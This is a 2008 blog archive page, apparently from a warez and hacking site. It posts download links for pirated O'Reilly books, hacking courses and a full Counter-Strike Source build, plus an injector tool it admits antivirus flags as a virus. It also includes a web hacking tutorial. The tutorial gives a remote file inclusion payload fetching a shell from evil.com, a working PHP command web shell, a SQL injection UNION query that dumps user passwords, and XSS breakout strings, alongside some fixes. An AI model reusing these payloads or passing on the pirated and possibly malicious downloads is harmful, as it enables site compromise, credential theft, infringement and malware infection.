Archive for June, 2008
O Really Hacking Books
| June 14th, 2008Car PC Hacks - O’Reilly
Digital Photography Hacks
O’Reilly - 2005 - Mapping Hacks
O’Reilly - eBay Hacks 100 Industrial Strength Tips and Tools
O’Reilly Amazon Hacks
OReilly BSD Hacks
OReilly Digital Video Hacks
Oreilly Firefox Hacks
oreilly flash hacks
OReilly Google Hacks 2nd Edition
OReilly Halo 2 Hacks
OReilly IRC Hacks
O’Reilly Network Security Hacks
Oreilly Paypal Hacks
OReilly PC Hacks
OReilly PDF Hacks
OReilly Podcasting Hacks
OReilly Retro Gaming Hacks
OReilly Spidering Hacks
OReilly Visual Studio Hacks Mar.2005
O’Reilly Windows Server Hack
Oreilly Windows XP Hacks 2nd.edition
OReilly Wireless Hacks 100 Industrial - Strength Tips and Tools
Swing Hacks
Word Hacks - O’Reilly
Download:
http://rapidshare.com/files/93566469/O_Reallys.part1.rar
http://rapidshare.com/files/93563800/O_Reallys.part2.rar
Hacker Black CD
| June 14th, 200828:41 Series Intro
29:16 Hacker Terms
35:54 Hacker Procedures
26:42 Using VMWare
49:17 Using Linux
27:44 Passive Intelligence Gathering Part 1
31:43 Passive Intelligence Gathering Part 2
33:24 Social Engineering
33:33 Network Reconnaissance Part 1
30:25 Network Reconnaissance Part 2
33:03 Service Identification and Enumeration
35:35 Vulnerability Assessment: Nessus & GFI Languard
26:35 Vulnerability Assessment: Network Sniffing
34:55 SNMP
33:01 DNS
44:13 Password Cracking
36:58 Exploits Part 1: Linux
34:09 Exploits Part 2: Windows
24:36 Web and File Exploits
37:56 Wireless Security
20:33 Erasing Tracks
arp spoofing
Null session
Download:
http://rapidshare.com/files/102108980/Hacker_Black_CD.part01.rar http://rapidshare.com/files/102112293/Hacker_Black_CD.part02.rar http://rapidshare.com/files/102115645/Hacker_Black_CD.part03.rar http://rapidshare.com/files/102395271/Hacker_Black_CD.part04.rar http://rapidshare.com/files/102398225/Hacker_Black_CD.part05.rar http://rapidshare.com/files/103178815/Hacker_Black_CD.part06.rar http://rapidshare.com/files/102391957/Hacker_Black_CD.part07.rar http://rapidshare.com/files/102107461/Hacker_Black_CD.part08.rarGray Hat 2nd Edition
| June 14th, 2008
Prevent catastrophic network attacks by exposing security flaws, fixing them, and ethically reporting them to the software author. Fully expanded to cover the hacker’s latest devious methods, Gray Hat Hacking: The Ethical Hacker’s Handbook, Second Edition lays out each exploit alongside line-by-line code samples, detailed countermeasures, and moral disclosure procedures. Find out how to execute effective penetration tests, use fuzzers and sniffers, perform reverse engineering, and find security holes in Windows and Linux applications. You’ll also learn how to trap and autopsy stealth worms, viruses, rootkits, adware, and malware.
- Implement vulnerability testing, discovery, and reporting procedures that comply with applicable laws
- Learn the basics of programming, stack operations, buffer overflow and heap vulnerabilities, and exploit development
- Test and exploit systems using Metasploit and other tools
- Break in to Windows and Linux systems with perl scripts, Python scripts, and customized C programs
- Analyze source code using ITS4, RATS, FlawFinder, PREfast, Splint, and decompilers
- Understand the role of IDA Pro scripts, FLAIR tools, and third-party plug-ins in discovering software vulnerabilities
- Reverse-engineer software using decompiling, profiling, memory monitoring, and data flow analysis tools
- Reveal client-side web browser vulnerabilities with MangleMe, AxEnum, and AxMan
- Probe Windows Access Controls to discover insecure access tokens, security descriptors, DACLs, and ACEs
- Find and examine malware and rootkits using honeypots, honeynets, and Norman SandBox technology
Download:
http://www.mediafire.com/?hkab9049ddx
The Art of Exploitation, 2nd Edition
| June 14th, 2008
Hacking: The Art of Exploitation, 2nd Edition
by Jon Erickson
Publisher: No Starch
Pub Date: January 15, 2008
Print ISBN-13: 978-1-59-327144-2
Pages: 480
Overview
Hacking is the art of creative problem solving, whether that means finding an unconventional solution to a difficult problem or exploiting holes in sloppy programming. Many people call themselves hackers, but few have the strong technical foundation needed to really push the envelope. Rather than merely showing how to run existing exploits, author Jon Erickson explains how arcane hacking techniques actually work. To share the art and science of hacking in a way that is accessible to everyone, Hacking: The Art of Exploitation, 2nd Edition introduces the fundamentals of C programming from a hacker’s perspective.
The included LiveCD provides a complete Linux programming and debugging environment-all without modifying your current operating system. Use it to follow along with the book’s examples as you fill gaps in your knowledge and explore hacking techniques on your own. Get your hands dirty debugging code, overflowing buffers, hijacking network communications, bypassing protections, exploiting cryptographic weaknesses, and perhaps even inventing new exploits. This book will teach you how to:
- Program computers using C, assembly language, and shell scripts
- Corrupt system memory to run arbitrary code using buffer overflows and format strings.
- Inspect processor registers and system memory with a debugger to gain a real understanding of what is happening.
- Outsmart common security measures like nonexecutable stacks and intrusion detection systems.
- Gain access to a remote server using port-binding or connect-back shellcode, and alter a server’s logging behavior to hide your presence.
- Redirect network traffic, conceal open ports, and hijack TCP connections.
- Crack encrypted wireless traffic using the FMS attack, and speed up brute-force attacks using a password probability matrix.
Hackers are always pushing the boundaries, investigating the unknown, and evolving their art. Even if you don’t already know how to program, Hacking: The Art of Exploitation, 2nd Edition will give you a complete picture of programming, machine architecture, network communications, and existing hacking techniques. Combine this knowledge with the included Linux environment, and all you need is your own creativity.
http://w16.easy-share.com/1700425601.html
Web Hacking [Basic]
| June 14th, 2008In this tutorial, we will discuss the vulnerabilities, and what goes wrong with the developer, and some ways to exploit them…
Enjoy!!
Tutorial: [ Basic || 1 ]
+——————————————+
|
| || Starter ||
|
+——————————————+
Things to know:
=- Vulnerability : a security hole, can be exploited to change the way the webapp / software works / functions.
=- CMS’s, Forums uses DataBases to store the info like users, posts, threads, messages and so on, its usually / mostly a MySQL server.
=- RFI [ Remote File Inclusion ] : a malicious user can include a ‘bad’ code to be executed on the vulnerable site.
=- LFI [ Local File Inclusion ] : a malicious user can open any file on the server.
=- SQL Injection : Injecting a MySQL query to bypass or get more info from a DataBase.
=- XSS [ Cross Site Scripting ] : if it was a permanent vulnerability, where the users input is saved, the user can log cookies, IP, and much more…
=- Exploit : a script made to maliciously use a vulnerability.
+——————————————+
|
| || What goes wrong ||
|
+——————————————+
We are going to take each vulnerability, and take alook at what goes wrong with the web developer, that made the script vulnerable…
=- RFI ::
RFI’s are exploited by including a ‘bad’ code from another site, to the infected site, for example you can include a PHP-Shell, and execute command on the server using it…
this vulnerability is very dangerous, a site infected with it can be compromised easily…
an example of a code infected with a RFI:
<?php
$page = $_GET['page'];
if (isset($page))
{
include($page);
}
?>
as you can see, we are taking the variable page, and including it, now that script will work great and do what it’s supposed to do, for example:
www.example.com/index.dmz?page=contact.dmz
this would open contact.dmz, BUT, what would a malicious user do?
www.example.com/index.dmz?page=http://www.evil.com/shell.txt?
the shell code must be in a txt file, because this way the code will be parsed / executed on the vulnerable site.
what happens then?
<?php
$page = $_GET['page'];
if (isset($page))
{
include(’http://www.evil.com/shell.txt?’);
}
?>
that text file gets included, so lets say the shell.txt had the following code:
<?php
$command = $_GET['cmd'];
if ($command)
{
@system($command);
}
echo ”
<form method=’GET’>
<input type=’text’ name=’cmd’>
<input type=’submit’ name=’submit’ value=’Go!’>
</form>”;
?>
a small text box would appear on the page, with a button, that would execute commands… the user can compromise the full site using this simple text box, if he had enough privs, he can do the following:
rm -rf
and delete your files…
some devs, think they can fix the vulnerability by doing the following:
<?php
$page = $_GET['page'];
$page = $page . “.php”;
if (isset($page))
{
include($page);
}
?>
this way, you can only include .php files, and that is not really a big deal cause PHP gets parsed on the server side…
but, that wont stop some people, there is something called a NullByte, that would simply tell PHP to ignore anything after it… if someone wanted to exploit that code, he would do:
www.example.com/index.dmz?page=http://www.evil.com/shell.txt?%00
as you can see, the [ %00 ] is the NullByte, that would get parsed this way:
<?php
$page = $_GET['page'];
$page = $page . “.php”;
if (isset($page))
{
include(’http://www.evil.com/shell.txt?’); // ignoring anything after the Nu
llByte, which is in this case, the .php…
}
?>
so the question now, is how to completely secure this URL system?!
well, you can use a switch statement, and this way, anything other than what is already stated, wont be included.. ex:
<?php
if(isset($_REQUEST['page']))
{
switch ($_REQUEST['page']) {
case ‘about’:
include(’about.php’); // if the page was about, get the about.php contents…
break;
case ‘contact’:
include(’contact.php’); // and so on ![]()
break;
default:
include(’index.php’); // the default page to include, if the page variable was n
ot found, or it was a hack attempt ![]()
break;
}
}
?>
that is a perfect system, simple, secure, and works
now that is done, RFI, is just like LFI, nothing is different, but the fact that LFI only gets the pages from the server, most of the times download scripts are infected with LFI, cause they are made to readfile(); whatever it was lol.. which is just bad coding…
Now moving to SQL injections, those are deadly when E-Commerce sites are infected with them!!
a malicious user would exploit an infected code, by bypassing a login form, and logging in as admin.
or by injecting the URL so he can execute MySQL query’s, which would let him gain access to Users info, and so on …
example of vulnerable code:
<?php
$host = “localhost”;
$user = “root”;
$pass = “r00t”;
$db = “banks”;
mysql_connect($host, $user, $pass);
mysql_select_db($db);
$id = $_GET['id'];
if (isset($id))
{
$query = mysql_query(”SELECT * FROM `news` WHERE `id` = $id”);
if ($query)
{
while($news = mysql_fetch_array($query))
{
echo $news['news'];
}
}
}
?>
now, as you can see, it takes the ‘id’ variable, and query’s it, with no filters at all!!!
now if i wanted to inject it, i would first check for the vulnerability…. by doing the following:
www.example.com/page.php?id=1 OR 2
IF 2 news was there, then am lucky :D, and here comes the good part, where the information gets extracted, using a UNION command, i can select from another column, and echo it there…
so an injection would be:
www.example.com/page.php?id=1 OR 2 UNION SELECT name,1,password,email FROM users
this would echo the passwords, to the page. now depending on the number of rows in the news column, i will need to change the number of rows selected…
so now we know what went wrong, lets secure it!!
<?php
$host = “localhost”;
$user = “root”;
$pass = “r00t”;
$db = “banks”;
@mysql_connect($host, $user, $pass); // adding the @ sign will make it error fre
e, no errors is shown if the DB couldnt be selected or connection refused
@mysql_select_db($db);
$id = (Int) $_GET['id']; // now we are telling PHP that id is an Integer
, do not process anything else..
if (isset($id))
{
$query = mysql_query(”SELECT * FROM `news` WHERE `id` = $id”);
if ($query)
{
while($news = mysql_fetch_array($query))
{
echo $news['news'];
}
}
}
?>
that is it, this code is secure…
now moving to XSS, it is not really a big issue UNLESS it was permanent!
example of permanent XSS would be in a guestbook, comments, contact forms, mailing lists, etc…
what can the malicious user do?
well, he can use a javascript to change title, forms, prices, hidden data, pages, actions, and even worse, log the page!
some CMS’s and Forums, uses cookies and store the users info in them, if that site was vulnerable to XSS, the attacker can gain admin privs by logging the admin cookies…
a vulnerable code would be:
<?php
$message = $_POST['message'];
if (isset($_POST['message']))
{
echo “Thank you, your message has been posted!”;
echo “<br />”;
echo $message;
}
echo ”
<form method=’post’ name=’message_box’>
<input type=’text’ name=’message’>
<input type=’submit’ name=’submit’>
</form>”;
?>
ok, so now a malicious user could do the following:
submit the following text to test for vulnerability :
<script>alert(”xss”)</script>
or
<h1>Nice Website!</h1>
IF the HTML gets parsed “and it will in this code” , the attacker will now move to the next step, which is logging the page.. by redirecting it to a logger..
some methods of bypassing some filters, for example, if the form only submits links, lets take this one as an example:
<?php
$message = $_POST['message'];
if (isset($_POST['message']))
{
echo “Thank you, your link has been added!”;
echo “<br />”;
echo “<a href=’$message’>Link</a>”;;
}
echo ”
<form method=’post’ name=’message_box’>
<input type=’text’ name=’message’>
<input type=’submit’ name=’submit’>
</form>”;
?>
now that should not parse anything, but simply wrap it in a link right?
well, i don’t think so, you can simply bypass it using:
‘> <script>alert(”owned”)</script>
why does that bypass it?!
here is what happens, the
‘>
will stop the a tag, and then you can open anything else…
here is the result:
<a href=”> <script>alert(”owned”)</script>’>Link</a>
as you can see, the a tag got closed, which allowed me to open another tag, which is a script here. and it works
+——————————————+
|
| || The End ||
|
+——————————————+
Well, we are done now :), i hope you enjoyed this tutorial, and learned something new from it…
SQL Injection Video Tutorial
| June 14th, 2008Di tutorial ini akan diajarkan bgmn cara melakukan SQL injeksi dan mengambil password website admin
Silahkan dipelajari dan dipraktekkan
Click DISINI untuk melihatnya.
Tutorial diatas hanya untuk edukasi, DILARANG keras menggunakan tutorial diatas untuk merusak.
Counter Strike Source Full
| June 13th, 2008
Counter-Strike is the #1 online action game in the world. Engage in a realistic brand of counter-terrorist warfare in this popular team-based game. Take out enemy sites. Rescue hostages. Your role affects your team’s success. Your team’s success affects your role.
Download Links
http://rapidshare.com/files/67317813/CSS_full_v17.1_DiGiTALZonE.part01.rar
http://rapidshare.com/files/67322739/CSS_full_v17.1_DiGiTALZonE.part02.rar
http://rapidshare.com/files/67335024/CSS_full_v17.1_DiGiTALZonE.part03.rar
http://rapidshare.com/files/67337878/CSS_full_v17.1_DiGiTALZonE.part04.rar
http://rapidshare.com/files/67340887/CSS_full_v17.1_DiGiTALZonE.part05.rar
http://rapidshare.com/files/67351692/CSS_full_v17.1_DiGiTALZonE.part06.rar
http://rapidshare.com/files/67362444/CSS_full_v17.1_DiGiTALZonE.part07.rar
http://rapidshare.com/files/67366222/CSS_full_v17.1_DiGiTALZonE.part08.rar
http://rapidshare.com/files/67369864/CSS_full_v17.1_DiGiTALZonE.part09.rar
http://rapidshare.com/files/67374112/CSS_full_v17.1_DiGiTALZonE.part10.rar
http://rapidshare.com/files/67378180/CSS_full_v17.1_DiGiTALZonE.part11.rar
http://rapidshare.com/files/67382402/CSS_full_v17.1_DiGiTALZonE.part12.rar
http://rapidshare.com/files/67386607/CSS_full_v17.1_DiGiTALZonE.part13.rar
http://rapidshare.com/files/67390794/CSS_full_v17.1_DiGiTALZonE.part14.rar
http://rapidshare.com/files/67395495/CSS_full_v17.1_DiGiTALZonE.part15.rar
http://rapidshare.com/files/67399451/CSS_full_v17.1_DiGiTALZonE.part16.rar
http://rapidshare.com/files/67358761/CSS_full_v17.1_DiGiTALZonE.part17.rar
http://rapidshare.com/files/67313462/CSS_full_v17.1_DiGiTALZonE.part18.rar
http://rapidshare.com/files/67456894/CSS_Patch_v18_30-10-2007-DZ.exe
Private SQL Injection
| June 13th, 2008
Some Anti-Virus may detect this as virus (but I tried it, it works perfectly)
Ada beberapa Anti virus mungkin men-detek program ini sebagai virus (tp uda gw coba, aman n canggih)
http://rapidshare.com/files/114386543/Private_SQL_Scanner_and_injector.zip

